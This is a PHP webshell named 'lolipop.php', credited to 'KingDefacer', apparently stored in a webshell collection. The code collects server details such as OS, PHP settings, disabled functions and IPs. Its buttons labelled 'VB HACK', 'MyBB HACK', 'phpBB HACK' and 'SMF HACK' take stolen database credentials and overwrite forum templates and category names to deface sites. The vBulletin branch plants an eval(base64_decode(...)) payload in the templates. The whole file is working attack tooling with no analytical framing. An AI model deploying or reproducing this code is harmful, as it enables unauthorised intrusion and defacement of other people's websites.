webshells/php/lolipop.php

289 lines
13 KiB
PHP
Raw Normal View History

2015-01-12 22:32:48 +00:00
<p align="right"></p><body bgcolor="#FFFFFF">
<?php
######################## Begining of Coding ;) ######################
error_reporting(0);
$info = $_SERVER['SERVER_SOFTWARE'];
$site = getenv("HTTP_HOST");
$page = $_SERVER['SCRIPT_NAME'];
$sname = $_SERVER['SERVER_NAME'];
$uname = php_uname();
$smod = ini_get('safe_mode');
$disfunc = ini_get('disable_functions');
$yourip = $_SERVER['REMOTE_ADDR'];
$serverip = $_SERVER['SERVER_ADDR'];
$version = phpversion();
$ccc = realpath($_GET['chdir'])."/";
$fdel = $_GET['fdel'];
$execute = $_POST['execute'];
$cmd = $_POST['cmd'];
$commander = $_POST['commander'];
$ls = "ls -la";
$source = $_POST['source'];
$gomkf = $_POST['gomkf'];
$title = $_POST['title'];
$sourcego = $_POST['sourcego'];
$ftemp = "tmp";
$temp = tempnam($ftemp, "cx");
$fcopy = $_POST['fcopy'];
$tuser = $_POST['tuser'];
$user = $_POST['user'];
$wdir = $_POST['wdir'];
$tdir = $_POST['tdir'];
$symgo = $_POST['symgo'];
$sym = "xhackers.txt";
$to = $_POST['to'];
$sbjct = $_POST['sbjct'];
$msg = $_POST['msg'];
$header = "From:".$_POST['header'];
//PHPinfo
if(isset($_POST['phpinfo']))
{
die(phpinfo());
}
//Guvenli mod vs vs
if ($smod)
{
$c_h = "<font color=red face='Verdana' size='1'>ON</font>";
}
else
{
$c_h = "<font face='Verdana' size='1' color=green>OFF</font>";
}
//Kapali Fonksiyonlar
if (''==($disfunc))
{
$dis = "<font color=green>None</font>";
}
else
{
$dis = "<font color=red>$disfunc</font>";
}
//Dizin degisimi
if(isset($_GET['dir']) && is_dir($_GET['dir']))
{
chdir($_GET['dir']);
}
$ccc = realpath($_GET['chdir'])."/";
//Baslik
echo "<head>
<style>
body { font-size: 12px;
font-family: arial, helvetica;
scrollbar-width: 5;
scrollbar-height: 5;
scrollbar-face-color: black;
scrollbar-shadow-color: silver;
scrollbar-highlight-color: silver;
scrollbar-3dlight-color:silver;
scrollbar-darkshadow-color: silver;
scrollbar-track-color: black;
scrollbar-arrow-color: silver;
}
</style>
<title>Lolipop.php - Edited By KingDefacer - [$site]</title></head>";
//Ana tablo
echo "<body text='#FFFFFF'>
<table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'>
<tr>
<td><font color='#000000'>
<font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font>
</tr>
<tr>
<td style='border: 1px solid #333333'>
<font face='Verdana' size='1' color='#000000'>Site: <u>$site</u><br>Server name: <u>$sname</u><br>Software: <u>$info</u><br>Version : <u>$version</u><br>Uname -a: <u>$uname</u><br>Path: <u>$ccc</u><br>Safemode: <u>$c_h</u><br>Disable Functions: <u>$dis</u><br>Page: <u>$page</u><br>Your IP: <u>$yourip</u><br>Server IP: <u><a href='http://whois.domaintools.com/".$serverip."'>$serverip</a></u></font></td>
</tr>
</table>";
echo '<td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr>
';
//Buton Listesi
echo "<center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center>";
//VB HACK
if (isset($_POST['vbulletin']))
{
echo "<center><table border=0 width='100%'>
<tr><td>
<center><font face='Arial' color='#000000'>==Lolipop VB index.==</font></center>
<center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=dbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=dbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=dbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=dbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>?ndexin Yaz?lacag? B?l?m</font><br><textarea name=index rows='19' cols='103' style='color: #000000; background-color: #FFFFFF'>buraya indexiniz gelecek.?ndexi yaz postala kay gitsin.</textarea><br>
<input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>";
die();
}
$KingDefacer="Powered By Lolipop :))";
$dbh = $_POST['dbh'];
$dbu = $_POST['dbu'];
$dbn = $_POST['dbn'];
$dbp = $_POST['dbp'];
$index = $_POST['index'];
$index=str_replace("\'","'",$index);
$set_index = "{\${eval(base64_decode(\'";
$set_index .= base64_encode("echo \"$index\";");
$set_index .= "\'))}}{\${exit()}}</textarea>";
if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index))
{
mysql_connect($dbh,$dbu,$dbp) or die(mysql_error());
mysql_select_db($dbn) or die(mysql_error());
$loli1 = "UPDATE template SET template='".$set_index."".$KingDefacer."' WHERE title='spacer_open'";
$loli2 = "UPDATE template SET template='".$set_index."".$KingDefacer."' WHERE title='FORUMHOME'";
$loli3 = "UPDATE style SET css='".$set_index."".$KingDefacer."', stylevars='', csscolors='', editorstyles=''";
$result = mysql_query($loli1) or die (mysql_error());
$result = mysql_query($loli2) or die (mysql_error());
$result = mysql_query($loli3) or die (mysql_error());
echo "<script>alert('Vb Hacked');</script>";
}
//MyBB Hack
if (isset($_POST['mybulletin']))
{
echo "<center><table border=0 width='100%'>
<tr><td>
<center><font face='Arial' color='#000000'>==Lolipop MyBB index.==</font></center>
<center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=mybbdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=mybbdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=mybbdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=mybbdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>?ndexin Yaz?lacag? B?l?m</font><br><textarea name=mybbindex rows='19' cols='103' style='color: #000000; background-color: #FFFFFF'>buraya indexiniz gelecek.?ndexi yaz postala kay gitsin.</textarea><br>
<input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>";
die();
}
$mybb_dbh = $_POST['mybbdbh'];
$mybb_dbu = $_POST['mybbdbu'];
$mybb_dbn = $_POST['mybbdbn'];
$mybb_dbp = $_POST['mybbdbp'];
$mybb_index = $_POST['mybbindex'];
if (!empty($mybb_dbh) && !empty($mybb_dbu) && !empty($mybb_dbn) && !empty($mybb_index))
{
mysql_connect($mybb_dbh,$mybb_dbu,$mybb_dbp) or die(mysql_error());
mysql_select_db($mybb_dbn) or die(mysql_error());
$prefix="mybb_";
$loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";
$result = mysql_query($loli7) or die (mysql_error());
echo "<script>alert('MyBB Hacked');</script>";
}
//PhpBB
if (isset($_POST['phpbb']))
{
echo "<center><table border=0 width='100%'>
<tr><td>
<center><font face='Arial' color='#000000'>==Lolipop PHPBB index.==</font></center>
<center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=phpbbdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=phpbbdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=phpbbdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=phpbbdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Yazi Veya KOD<br></font><input type=text name=phpbbkat size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Degisecek KATEGORI ID si<br></font><input type=text name=katid size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>";
die();
}
$phpbb_dbh = $_POST['phpbbdbh'];
$phpbb_dbu = $_POST['phpbbdbu'];
$phpbb_dbn = $_POST['phpbbdbn'];
$phpbb_dbp = $_POST['phpbbdbp'];
$phpbb_kat = $_POST['phpbbkat'];
$kategoriid=$_POST['katid'];
if (!empty($phpbb_dbh) && !empty($phpbb_dbu) && !empty($phpbb_dbn) && !empty($phpbb_kat))
{
mysql_connect($phpbb_dbh,$phpbb_dbu,$phpbb_dbp) or die(mysql_error());
mysql_select_db($phpbb_dbn) or die(mysql_error());
$loli10 = "UPDATE phpbb_categories SET cat_title='".$phpbb_kat."' WHERE cat_id='".$kategoriid."'";
$result = mysql_query($loli10) or die (mysql_error());
echo "<script>alert('PhpBB Hacked');</script>";
}
//SmfHACK
if (isset($_POST['smf']))
{
echo "<center><table border=0 width='100%'>
<tr><td>
<center><font face='Arial' color='#000000'>==Lolipop SMF Index.==</font></center>
<center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=smfdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=smfdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=smfdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=smfdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Yazi Yada KOD<br></font><input type=text name=smf_index size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Degisecek KATEGORI ID si <br></font><input type=text name=katid size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>";
die();
}
$smf_dbh = $_POST['smfdbh'];
$smf_dbu = $_POST['smfdbu'];
$smf_dbn = $_POST['smfdbn'];
$smf_dbp = $_POST['smfdbp'];
$smf_index = $_POST['smf_index'];
$smf_katid=$_POST['katid'];
if (!empty($smf_dbh) && !empty($smf_dbu) && !empty($smf_dbn) && !empty($smf_index))
{
mysql_connect($smf_dbh,$smf_dbu,$smf_dbp) or die(mysql_error());
mysql_select_db($smf_dbn) or die(mysql_error());
$prefix="smf_";
$loli12 = "UPDATE ".$prefix."categories SET name='".$smf_index."' WHERE ID_CAT='".$smf_katid."'";
$result = mysql_query($loli12) or die (mysql_error());
echo "<script>alert('smf Hacked');</script>";
}
//Alt taraf
echo "
<br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'>
<tr>
<td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'>
<p><strong>Lolipop.php</strong></p>
<p><strong>Edited By KingDefacer</strong></p>
<p><strong></strong><br>
</p></td>
</tr></table>";
// Kod bitisi
?>